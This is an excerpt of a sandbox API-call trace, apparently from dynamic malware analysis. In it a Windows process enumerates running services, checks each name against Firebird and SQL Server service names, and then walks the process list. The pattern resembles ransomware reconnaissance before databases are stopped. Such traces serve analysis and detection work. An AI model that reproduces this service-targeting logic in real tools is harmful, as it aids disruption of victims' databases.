EnumServicesStatusExW (in: hSCManager=0x6bee08, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0) returned 0 [0185.959] GetLastError () returned 0xea [0185.959] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1c30) returned 0x772a00 [0185.959] EnumServicesStatusExW (in: hSCManager=0x6bee08, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x772a00, cbBufSize=0x1c30, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x772a00, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0) returned 1 [0185.960] CloseServiceHandle (hSCObject=0x6bee08) returned 1 [0185.960] lstrlenW (lpString="Appinfo") returned 7 [0185.960] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0185.960] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0185.960] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0185.960] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0185.960] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0185.961] lstrlenW (lpString="AppXSvc") returned 7 [0185.961] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0185.961] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0185.961] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0185.961] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0185.961] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0185.961] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0185.961] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0185.961] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0185.961] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0185.961] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0185.961] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0185.961] lstrlenW (lpString="Audiosrv") returned 8 [0185.961] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0185.961] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0185.961] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0185.961] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0185.961] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0185.961] lstrlenW (lpString="BFE") returned 3 [0185.961] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0185.961] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0185.961] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0185.961] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0185.961] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0185.961] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0185.961] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0185.961] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0185.962] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0185.962] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0185.962] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0185.962] lstrlenW (lpString="CDPSvc") returned 6 [0185.962] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0185.962] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0185.962] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0185.962] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0185.962] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0185.962] lstrlenW (lpString="ClickToRunSvc") returned 13 [0185.962] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0185.962] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0185.962] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0185.962] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0185.962] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0185.962] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0185.962] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0185.962] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0185.962] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0185.962] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0185.962] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0185.962] lstrlenW (lpString="CryptSvc") returned 8 [0185.962] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0185.962] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0185.962] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0185.962] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0185.962] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0185.962] lstrlenW (lpString="DcomLaunch") returned 10 [0185.962] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0185.963] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0185.963] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0185.963] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0185.963] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0185.963] lstrlenW (lpString="DeviceAssociationService") returned 24 [0185.963] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0185.963] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0185.963] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0185.963] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0185.963] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0185.963] lstrlenW (lpString="Dhcp") returned 4 [0185.963] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0185.963] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0185.963] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0185.963] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0185.963] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0185.963] lstrlenW (lpString="Dnscache") returned 8 [0185.963] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0185.963] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0185.963] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0185.963] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0185.963] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0185.963] lstrlenW (lpString="DPS") returned 3 [0185.963] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0185.963] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0185.963] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0185.963] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0185.963] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0185.963] lstrlenW (lpString="DusmSvc") returned 7 [0185.964] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0185.964] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0185.964] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0185.964] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0185.964] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0185.964] lstrlenW (lpString="EventLog") returned 8 [0185.964] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0185.964] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0185.964] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0185.964] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0185.964] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0185.964] lstrlenW (lpString="EventSystem") returned 11 [0185.964] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0185.964] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0185.964] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0185.964] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0185.964] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0185.964] lstrlenW (lpString="FontCache") returned 9 [0185.964] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0185.964] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0185.964] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0185.964] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0185.964] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0185.964] lstrlenW (lpString="gpsvc") returned 5 [0185.964] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0185.964] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0185.964] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0185.964] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0185.965] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0185.965] lstrlenW (lpString="iphlpsvc") returned 8 [0185.965] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0185.965] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0185.965] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0185.965] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0185.965] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0185.965] lstrlenW (lpString="KeyIso") returned 6 [0185.965] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0185.965] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0185.965] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0185.965] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0185.965] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0185.965] lstrlenW (lpString="LanmanServer") returned 12 [0185.965] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0185.965] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0185.965] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0185.965] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0185.965] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0185.965] lstrlenW (lpString="LanmanWorkstation") returned 17 [0185.965] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0185.965] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0185.965] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0185.965] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0185.965] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0185.965] lstrlenW (lpString="lfsvc") returned 5 [0185.965] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0185.965] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0185.965] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0185.966] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0185.966] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0185.966] lstrlenW (lpString="lmhosts") returned 7 [0185.966] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0185.966] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0185.966] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0185.966] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0185.966] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0185.966] lstrlenW (lpString="LSM") returned 3 [0185.966] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0185.966] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0185.966] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0185.966] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0185.966] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0185.966] lstrlenW (lpString="MpsSvc") returned 6 [0185.966] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0185.966] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0185.966] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0185.966] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0185.966] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0185.966] lstrlenW (lpString="NcbService") returned 10 [0185.966] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0185.966] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0185.966] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0185.966] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0185.966] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0185.966] lstrlenW (lpString="netprofm") returned 8 [0185.966] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0185.966] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0185.967] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0185.967] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0185.967] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0185.967] lstrlenW (lpString="NgcSvc") returned 6 [0185.967] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0185.967] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0185.967] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0185.967] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0185.967] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0185.967] lstrlenW (lpString="NlaSvc") returned 6 [0185.967] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0185.967] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0185.967] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0185.967] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0185.967] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0185.967] lstrlenW (lpString="nsi") returned 3 [0185.967] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0185.967] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0185.967] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0185.967] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0185.967] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0185.967] lstrlenW (lpString="PcaSvc") returned 6 [0185.967] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0185.967] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0185.967] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0185.967] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0185.967] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0185.967] lstrlenW (lpString="PlugPlay") returned 8 [0185.967] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0185.968] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0185.968] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0185.968] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0185.968] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0185.968] lstrlenW (lpString="Power") returned 5 [0185.968] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0185.968] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0185.968] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0185.968] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0185.968] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0185.968] lstrlenW (lpString="ProfSvc") returned 7 [0185.968] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0185.968] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0185.968] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0185.968] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0185.968] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0185.968] lstrlenW (lpString="RpcEptMapper") returned 12 [0185.968] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0185.968] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0185.968] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0185.968] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0185.968] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0185.968] lstrlenW (lpString="RpcSs") returned 5 [0185.968] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0185.968] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0185.968] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0185.968] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0185.968] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0185.968] lstrlenW (lpString="SamSs") returned 5 [0185.969] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0185.969] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0185.969] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0185.969] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0185.969] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0185.969] lstrlenW (lpString="Schedule") returned 8 [0185.969] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0185.969] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0185.969] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0185.969] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0185.969] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0185.969] lstrlenW (lpString="SecurityHealthService") returned 21 [0185.969] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0185.969] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0185.969] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0185.969] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0185.969] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0185.969] lstrlenW (lpString="SENS") returned 4 [0185.969] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0185.969] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0185.969] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0185.969] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0185.969] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0185.969] lstrlenW (lpString="ShellHWDetection") returned 16 [0185.969] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0185.969] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0185.969] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0185.969] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0185.969] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0185.970] lstrlenW (lpString="Spooler") returned 7 [0185.970] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0185.970] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0185.970] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0185.970] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0185.970] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0185.970] lstrlenW (lpString="StateRepository") returned 15 [0185.970] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0185.970] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0185.970] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0185.970] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0185.970] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0185.970] lstrlenW (lpString="SysMain") returned 7 [0185.970] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0185.970] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0185.970] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0185.970] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0185.970] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0185.970] lstrlenW (lpString="SystemEventsBroker") returned 18 [0185.970] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0185.970] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0185.970] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0185.970] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0185.970] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0185.970] lstrlenW (lpString="Themes") returned 6 [0185.970] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0185.970] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0185.970] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0185.970] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0185.971] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0185.971] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0185.971] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0185.971] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0185.971] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0185.971] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0185.971] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x772a00 | out: hHeap=0x680000) returned 1 [0185.971] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x358 [0185.974] Process32FirstW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0185.975] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0185.976] lstrlenW (lpString="System") returned 6 [0185.976] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0185.981] lstrlenW (lpString="smss.exe") returned 8 [0185.981] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0185.982] lstrlenW (lpString="csrss.exe") returned 9 [0185.982] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0185.982] 